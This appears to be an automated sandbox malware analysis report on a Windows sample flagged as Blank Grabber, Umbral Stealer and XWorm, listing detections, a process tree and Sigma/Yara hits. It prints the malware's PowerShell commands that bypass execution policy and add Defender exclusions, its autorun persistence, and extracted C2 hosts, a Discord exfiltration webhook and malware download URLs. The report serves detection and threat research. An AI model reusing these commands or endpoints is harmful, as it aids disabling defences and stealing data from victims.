
Windows Analysis Report
8Hd0ZExgJz.exe

Overview

General Information

Sample name: 8Hd0ZExgJz.exe (renamed because the original name is a hash value)
Original sample name: 073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe
Analysis ID: 1556022
MD5: 7198fa10a50ea9aaf6ae5c2a05af2104
SHA1: c35a2a73313e3c5ad08136e3bc583bb9bc26964c
SHA256: 073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce
Tags: exe, user-Chainskilabs

Detection

Blank Grabber, Umbral Stealer, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Blank Grabber
Yara detected Powershell download and execute
Yara detected Umbral Stealer
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Drops PE files to the user root directory
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Uses ipconfig to lookup or modify the Windows network settings
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Use Short Name Path in Command Line
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 8Hd0ZExgJz.exe (PID: 6440 cmdline: "C:\Users\user\Desktop\8Hd0ZExgJz.exe" MD5: 7198FA10A50EA9AAF6AE5C2A05AF2104)
    • Injector.exe (PID: 2404 cmdline: "C:\Users\user~1\AppData\Local\Temp\Injector.exe" MD5: 3882CFE50E35985982E9EF0C01B99C47)
      • WMIC.exe (PID: 1456 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Windows Security Host.exe (PID: 6296 cmdline: "C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe" MD5: C7BA63CE2ED6D0AAB93AD839E0EDDD68)
      • powershell.exe (PID: 5112 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7544 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7864 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Windows Security Host.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8156 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • BootstrapperV1.23.exe (PID: 4064 cmdline: "C:\Users\user~1\AppData\Local\Temp\BootstrapperV1.23.exe" MD5: 02C70D9D6696950C198DB93B7F6A835E)
      • conhost.exe (PID: 6356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7144 cmdline: "cmd" /c ipconfig /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 1708 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)
      • WerFault.exe (PID: 7524 cmdline: C:\Windows\system32\WerFault.exe -u -p 4064 -s 2188 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • Windows Security Host.exe (PID: 608 cmdline: "C:\Users\user\Windows Security Host.exe" MD5: C7BA63CE2ED6D0AAB93AD839E0EDDD68)
  • Windows Security Host.exe (PID: 1316 cmdline: "C:\Users\user\Windows Security Host.exe" MD5: C7BA63CE2ED6D0AAB93AD839E0EDDD68)
  • cleanup
{"C2 url": ["127.0.0.1", "23.ip.gl.ply.gg"], "Port": 26848, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
{"C2 url": "https://discord.com/api/webhooks/1303474825066446879/NebQ1EAeNBTUfzGkn_W4tnvKCl9pOSQ87UqZdaxri0p165SfLuSuU_8R57ng1lqsCx6o", "Version": "v1.3"}
Source | Rule | Description | Author | Strings (listed below each row)
\Device\ConDrv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x11854:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x118f1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x11a06:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x108c6:$cnc4: POST / HTTP/1.1
C:\Users\user\Windows Security Host.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\Windows Security Host.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x11854:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x118f1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x11a06:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x108c6:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author | Strings (listed below each row)
00000000.00000002.1259484875.00000000026B1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.1259484875.00000000026B1000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x3c3c4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x56644:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x3c461:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x566e1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x3c576:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x567f6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x3b436:$cnc4: POST / HTTP/1.1
  • 0x556b6:$cnc4: POST / HTTP/1.1
00000003.00000000.1257101643.0000000000452000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000003.00000000.1257101643.0000000000452000.00000002.00000001.01000000.00000007.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x11654:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x116f1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x11806:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x106c6:$cnc4: POST / HTTP/1.1
00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security

Source | Rule | Description | Author | Strings (listed below each row)
0.2.8Hd0ZExgJz.exe.26f5df0.1.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.2.8Hd0ZExgJz.exe.26f5df0.1.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xfa54:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xfaf1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xfc06:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xeac6:$cnc4: POST / HTTP/1.1
0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x11854:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x118f1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x11a06:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x108c6:$cnc4: POST / HTTP/1.1
3.0.Windows Security Host.exe.450000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe, ParentProcessId: 6296, ParentProcessName: Windows Security Host.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', ProcessId: 5112, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe, ParentProcessId: 6296, ParentProcessName: Windows Security Host.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', ProcessId: 5112, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe, ParentProcessId: 6296, ParentProcessName: Windows Security Host.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', ProcessId: 5112, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe, ParentProcessId: 6296, ParentProcessName: Windows Security Host.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', ProcessId: 5112, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\Windows Security Host.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe, ProcessId: 6296, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Security Host
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe, ParentProcessId: 6296, ParentProcessName: Windows Security Host.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', ProcessId: 5112, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe, ProcessId: 6296, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Security Host.lnk
Source: Process started | Author: frack113, Nasreddine Bencherchali | Data: Command: "C:\Users\user~1\AppData\Local\Temp\Injector.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\Injector.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\Injector.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\Injector.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\Injector.exe, ParentCommandLine: "C:\Users\user\Desktop\8Hd0ZExgJz.exe", ParentImage: C:\Users\user\Desktop\8Hd0ZExgJz.exe, ParentProcessId: 6440, ParentProcessName: 8Hd0ZExgJz.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\Injector.exe" , ProcessId: 2404, ProcessName: Injector.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe, ParentProcessId: 6296, ParentProcessName: Windows Security Host.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', ProcessId: 5112, ProcessName: powershell.exe
Source: Process started | Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' | Data: Command: "cmd" /c ipconfig /all, CommandLine: "cmd" /c ipconfig /all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\BootstrapperV1.23.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe, ParentProcessId: 4064, ParentProcessName: BootstrapperV1.23.exe, ProcessCommandLine: "cmd" /c ipconfig /all, ProcessId: 7144, ProcessName: cmd.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-14T20:14:06.891834+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49703 | 104.21.93.27 | 443 | TCP

AV Detection

Source: 8Hd0ZExgJz.exe | Avira: detected
Source: https://4d38a1ec.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zip | Avira URL Cloud: Label: malware
Source: https://4d38a1ec.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Local\Temp\Injector.exe | Avira: detection malicious, Label: HEUR/AGEN.1307507
Source: C:\Users\user\Windows Security Host.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: 00000023.00000002.2035089860.00000000032B1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["127.0.0.1", "23.ip.gl.ply.gg"], "Port": 26848, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: 2.0.Injector.exe.242bb8d0000.0.unpack | Malware Configuration Extractor: Umbral Stealer {"C2 url": "https://discord.com/api/webhooks/1303474825066446879/NebQ1EAeNBTUfzGkn_W4tnvKCl9pOSQ87UqZdaxri0p165SfLuSuU_8R57ng1lqsCx6o", "Version": "v1.3"}
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe | ReversingLabs: Detection: 28%
Source: 8Hd0ZExgJz.exe | ReversingLabs: Detection: 60%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Injector.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Windows Security Host.exe | Joe Sandbox ML: detected
Source: 8Hd0ZExgJz.exe | Joe Sandbox ML: detected
Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack | String decryptor: 127.0.0.1,23.ip.gl.ply.gg
Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack | String decryptor: 26848
Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack | String decryptor: <123456789>
Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack | String decryptor: <Xwormmm>
Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack | String decryptor: XWorm V5.6
Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack | String decryptor: USB.exe
Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack | String decryptor: %Userprofile%
Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack | String decryptor: Windows Security Host.exe
Source: 8Hd0ZExgJz.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 128.116.123.3:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.22.46:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: 8Hd0ZExgJz.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Runtime.Serialization.ni.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Data.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: m.pdbE source: BootstrapperV1.23.exe, 00000004.00000002.1620001182.000001EFAF449000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Xml.ni.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.ni.pdbRSDS source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96E0C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.ni.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Drawing.ni.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbdllG source: BootstrapperV1.23.exe, 00000004.00000002.1620001182.000001EFAF3B0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Drawing.pdbX`h source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Configuration.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Data.ni.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Data.ni.pdbRSDSC source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Drawing.ni.pdbRSDS source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Xml.pdbp+ source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Xml.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.pdb source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96E0C000.00000004.00000800.00020000.00000000.sdmp, WERAD5E.tmp.dmp.23.dr
Source: Binary string: mscorlib.pdbh source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Core.ni.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Numerics.ni.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Data.pdbH source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Windows.Forms.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: mscorlib.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Drawing.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: mscorlib.ni.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Core.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Runtime.Serialization.pdb source: WERAD5E.tmp.dmp.23.dr
